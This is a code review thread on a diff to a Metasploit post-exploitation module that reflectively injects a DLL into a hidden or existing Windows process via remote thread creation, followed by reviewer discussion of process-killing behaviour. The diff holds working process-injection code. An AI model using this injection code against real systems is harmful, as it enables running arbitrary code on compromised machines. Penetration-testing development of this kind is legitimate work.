modules/post/windows/manage/reflective_dll_inject.rb

```diff
@@ -6,45 +6,167 @@
+    dll_path = ::File.expand_path(datastore['PATH'])
+    dll_path
+  end
+
+  def sanitize_process_name(process_name)
+    out_process_name = if process_name.split(//).last(4).join.eql? '.exe'
+                         process_name
+                       else
+                         process_name + '.exe'
+                       end
+    out_process_name
+  end
+
+  def pid_exists(pid)
+    return true
+  end
+
+  def launch_process
+    process_name = sanitize_process_name(datastore['PROCESS'])
+    print_status("Launching #{process_name} to inject Dll...")
+    channelized = if datastore['WAIT'] != 0
+                    true
+                  else
+                    false
+                  end
+
+    process = client.sys.process.execute(process_name, nil,
+                                                 'Channelized' => true,
+                                                 'Hidden' => true)
+    hprocess = client.sys.process.open(process.pid,
+                                      PROCESS_ALL_ACCESS)
+    print_good("Process #{hprocess.pid} launched.")
+    [process, hprocess]
+  end
+
+  def inject_dll(process,dll_path)
+    print_status("Reflectively injecting the DLL into #{process.pid}..")
+    library_path = ::File.expand_path(dll_path)
+    exploit_mem, offset = inject_dll_into_process(process, library_path)
+    [exploit_mem, offset]
+  end
+
+  def hook_process
+    print_status('Warning: output unavailable')
+    print_status("Hooking #{datastore['PID']} to be injected Dll...")
+    hprocess = client.sys.process.open(datastore['PID'],
+                                      PROCESS_ALL_ACCESS)
+    print_good("Process #{hprocess.pid} hooked.")
+    [nil, hprocess]
+  end
+
+  def run_dll(dll_path)
     print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
+    process, hprocess = if datastore['PID'] <= 0
+                          launch_process
+                        else
+                          hook_process
+                        end
+    exploit_mem, offset = inject_dll(hprocess,dll_path)
+
+    params_size = if datastore['ARGUMENTS'].nil?
+                    0
+                  else
+                    datastore['ARGUMENTS'].length
+                  end
 
-    pid = datastore['PID'].to_i
-    host_process = client.sys.process.open(pid, PROCESS_ALL_ACCESS)
+    arg_mem = copy_args(hprocess)
 
-    print_status("Injecting #{datastore['PATH']} into #{pid} ...")
-    dll_mem, offset = inject_dll_into_process(host_process, datastore['PATH'])
+    print_status('Executing...')
+    hprocess.thread.create(exploit_mem + offset, arg_mem)
 
-    print_status("DLL injected. Executing ReflectiveLoader ...")
-    host_process.thread.create(dll_mem + offset, 0)
-    print_good("DLL injected and invoked.")
+    if datastore['WAIT'] != 0
+      sleep(datastore['WAIT'])
+
+      if datastore['PID'] <= 0
+        read_output(process)
+        print_good("Killing process #{hprocess.pid}")
```

Comment:
Why would you kill the process if you've injected into it?

Reply:
Whereas the wait parameter determines whether the module retrieves the output or not.
The process is only terminated if wait is different from 0 and if the process was created together with the execution of the module. If the module is executed many times I would not want many processes left hanging.
I consider this to happen if you use this module to execute external components such as tasks that have a beginning and an end, as in the example.
On the other hand, if you inject a dll like Universal Unhooking which does not in itself foresee a beginning and an end, in this case the process is not terminated, this happens if wait is equal to 0.
Would you rather see process killing as an option the user can choose?

Reply:
That's not very intuitive, as a user I wouldn't expect the `WAIT` option to have any bearing on whether or not the process is killed. I think adding it in as an explicit advanced option would be the best.

Reply:
That's not very intuitive, as a user I wouldn't expect the WAIT option to have any bearing on whether or not the process is killed. I think adding it in as an explicit advanced option would be the best.